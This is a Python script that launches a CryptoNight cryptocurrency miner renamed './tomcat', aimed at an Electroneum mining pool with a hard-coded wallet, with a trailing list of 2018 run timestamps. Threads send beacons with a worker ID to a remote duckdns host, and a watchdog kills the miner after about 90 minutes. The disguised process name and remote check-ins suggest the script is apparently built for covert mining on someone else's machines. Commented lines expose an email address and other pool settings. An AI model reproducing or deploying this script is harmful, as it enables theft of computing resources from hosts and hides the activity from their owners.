import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:05.340754
#2018-02-17 17:20:08.816992
#2018-02-17 19:08:05.929547
#2018-02-17 20:58:06.087805
#2018-02-17 22:44:06.960723
#2018-02-18 00:28:07.342137
#2018-02-18 02:19:04.849923
#2018-02-18 04:07:02.126742
#2018-02-18 05:56:03.831917
#2018-02-18 07:46:05.270484
#2018-02-18 09:34:05.868331
#2018-02-18 11:20:08.992757
#2018-02-18 13:06:01.919252
#2018-02-18 14:55:01.621805
#2018-02-18 16:42:07.248145
#2018-02-18 18:31:07.285123
#2018-02-18 20:19:05.706768
#2018-02-18 22:04:04.508339
#2018-02-18 23:52:06.266820
#2018-02-19 01:38:05.628009
#2018-02-19 03:26:04.102680
#2018-02-19 05:11:04.178369
#2018-02-19 06:56:07.001081
#2018-02-19 08:45:08.119701
#2018-02-19 10:34:01.510852
#2018-02-19 12:22:05.901213
#2018-02-19 14:09:05.242744
#2018-02-19 15:59:03.650572
#2018-02-19 17:47:04.685349
#2018-02-19 19:35:10.810210
#2018-02-19 21:23:01.263835
#2018-02-19 23:09:04.125254
#2018-02-20 00:53:06.411220
#2018-02-20 02:42:04.599058
#2018-02-20 04:31:05.464045
#2018-02-20 06:15:06.848891
#2018-02-20 08:01:07.892272
#2018-02-20 09:47:01.651690
#2018-02-20 11:31:01.243024
#2018-02-20 13:17:07.068741
#2018-02-20 15:03:01.867115
#2018-02-20 16:48:09.923197
#2018-02-20 18:32:10.537989
#2018-02-20 20:22:05.903800
#2018-02-20 22:09:06.952059
#2018-02-20 23:48:07.770591
#2018-02-21 01:34:07.710915
#2018-02-21 03:22:02.075704
#2018-02-21 05:10:06.447867
#2018-02-21 06:58:06.235497
#2018-02-21 08:44:17.397013
#2018-02-21 10:31:06.075254
#2018-02-21 12:18:11.105238
#2018-02-21 14:07:02.000411
#2018-02-21 15:52:16.811519
#2018-02-21 17:43:02.131312
#2018-02-21 19:28:08.498838
#2018-02-21 21:18:05.226211
#2018-02-21 23:06:05.395049
#2018-02-22 00:53:02.183394
#2018-02-22 02:40:08.317650
#2018-02-22 04:28:07.258258
#2018-02-22 06:14:06.542284
#2018-02-22 08:01:05.209511
#2018-02-22 09:49:05.949459
#2018-02-22 11:33:09.494401
#2018-02-22 13:21:08.978155
#2018-02-22 15:10:11.751846
#2018-02-22 16:55:13.105770
#2018-02-22 18:44:06.545922
#2018-02-22 20:35:06.867030
#2018-02-22 22:21:05.180980
#2018-02-23 00:07:07.617873
#2018-02-23 01:57:03.629800
#2018-02-23 03:43:06.332099
#2018-02-23 05:28:05.225331
#2018-02-23 07:13:08.162537
#2018-02-23 09:19:05.598974
#2018-02-23 11:24:08.797741
#2018-02-23 13:14:04.216413
#2018-02-23 14:59:07.141408
#2018-02-23 16:48:10.663577
#2018-02-23 18:38:07.121079
#2018-02-23 20:25:01.424311
#2018-02-23 22:12:06.755997
#2018-02-24 00:00:01.664761
#2018-02-24 01:50:06.555246
#2018-02-24 03:43:06.062124
#2018-02-24 05:32:06.844325
#2018-02-24 07:18:05.217720
#2018-02-24 09:08:04.109624
#2018-02-24 10:42:03.893486
#2018-02-24 12:27:04.288980
#2018-02-24 14:04:06.431343
#2018-02-24 15:41:01.788448
#2018-02-24 17:19:04.856622
#2018-02-24 18:50:03.816254
#2018-02-24 20:22:05.909249
#2018-02-24 21:51:04.937095
#2018-02-25 01:54:06.547470
#2018-02-25 05:05:07.007400
#2018-02-25 10:10:01.342214